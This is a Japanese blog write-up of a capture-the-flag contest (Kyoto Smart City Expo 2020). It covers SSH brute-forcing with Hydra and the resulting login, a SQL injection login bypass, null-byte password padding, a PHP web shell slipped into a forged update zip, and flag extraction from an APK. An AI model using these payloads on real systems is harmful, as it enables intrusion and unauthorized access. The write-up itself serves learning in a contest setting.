kanyewest CTF

勉強したことをメモしています。

ハッキングコンテストin京都スマートシティエキスポ2020: Write up

CTF

0 decode(Very Easy)

$ echo -n 'RkxBR19reW90b3NtYXJ0Y2l0eWV4cG8=' | base64 -d
FLAG_kyotosmartcityexpo

1-1 FTP(Very Easy)

f:id:tekashi:20201212110719p:plain

1-2 SSH avoidance(Very Easy)

 hydra -L user.txt -P password.txt 54.150.39.201 -s 52222 ssh     255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-11 21:14:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:100/p:100), ~625 tries per task
[DATA] attacking ssh://54.150.39.201:52222/
[52222][ssh] host: 54.150.39.201   login: admin   password: password
$ ssh admin@54.150.39.201 -p 52222                                 255 ⨯
The authenticity of host '[54.150.39.201]:52222 ([54.150.39.201]:52222)' can't be established.
ECDSA key fingerprint is SHA256:K7NbGooE0P1B3L7BaC/or41slf4l+P8sfJSR71TtqIc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[54.150.39.201]:52222' (ECDSA) to the list of known hosts.
admin@54.150.39.201's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1030-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Dec 12 02:09:52 2020 from 115.124.149.87
admin@58d2aec14ceb:~$ ls
flag.txt  q6
admin@58d2aec14ceb:~$ cat flag.txt 
FLAG_jbSSTdXTLCc4aadmin@58d2aec14ceb:~$

2-1 basic authentication(Easy)

f:id:tekashi:20201212112912p:plain

6-1 exploration(Very Easy)

$ strings q6_backend_1.1
authUT
dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y=
contents.phpUT
"ip4h
{Y`SL

6yAx
Cj>Ks6
wIvS
t#Yt
authUT
contents.phpUT
(base) 13:18 ~/Downloads $ echo -n 'dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y=' | base64 -
d
version:1.1,name:admin,password:FLAG_e0rPFGGe6Hakv

7-1 hidden flag(Very Easy)

flag: FLAG_iZAPDhs3T2iYS

6-2 authentication avoidance(Easy)

username='+OR+1=1--&password=

f:id:tekashi:20201212132606p:plain

flag: FLAG_RqWGsVKFAQMUn

4-1 breakthrough(Easy)

f:id:tekashi:20201212132938p:plain

ログイン画面があって6文字以上のパスワードを求められる。ソースコードをみると

f:id:tekashi:20201212132926p:plain

パスワードは1234なので足りない分を%00で補うとログインできる。

username=user1&password=1234%00%00

f:id:tekashi:20201212133030p:plain

flag: FLAG_ajiofeijljkjsdklajie

6-3 clairvoyance(Medium)

f:id:tekashi:20201212135431p:plain

うまく更新ファイルをアップロードすれば任意のコード実行できそうだとわかる。

適当なファイルをアップロードしてもZIPの形式、またはパスワードが違いますと怒られるので既存のバージョン1.1の更新ファイルを参考にExploitできるファイルをつくる。

1.1.zipの中にあるcontents.php<?php echo shell_exec($_GET['p']);?>を追加して圧縮、アップロードする。

$ zip -rm 1.2.zip auth contents.php
  adding: auth (stored 0%)
  adding: contents.php (deflated 43%)

http://18.177.208.49/tmp/72386217aab504b7e38ee7c28415f2e1a9717101982109dec8.php?p=cat%20flag.phpflag.phpファイルを参照しようとするが

f:id:tekashi:20201212135742p:plain

root奪取しないといけないのかと一瞬焦ったがソースコードみたらFLAGがあった。

f:id:tekashi:20201212135822p:plain

flag: FLAG_ZaKKC00Wn9nis

5-1 Discovery key(Easy)

apkファイルはよくわからないのでapktoolつかって適当にデコードしたらAndroidManifest.xmlにFLAGがあった。

<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.example.getcoupon" platformBuildVersionCode="30" platformBuildVersionName="11">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:debuggable="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/Theme.GetCoupon" android:usesCleartextTraffic="true">
        <meta-data android:name="com.google.android.maps.v2.API_KEY" android:value="FLAG_2NHxcrKRph73j"/>
        <activity android:name="com.example.getcoupon.GetCouponActivity"/>
        <activity android:name="com.example.getcoupon.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>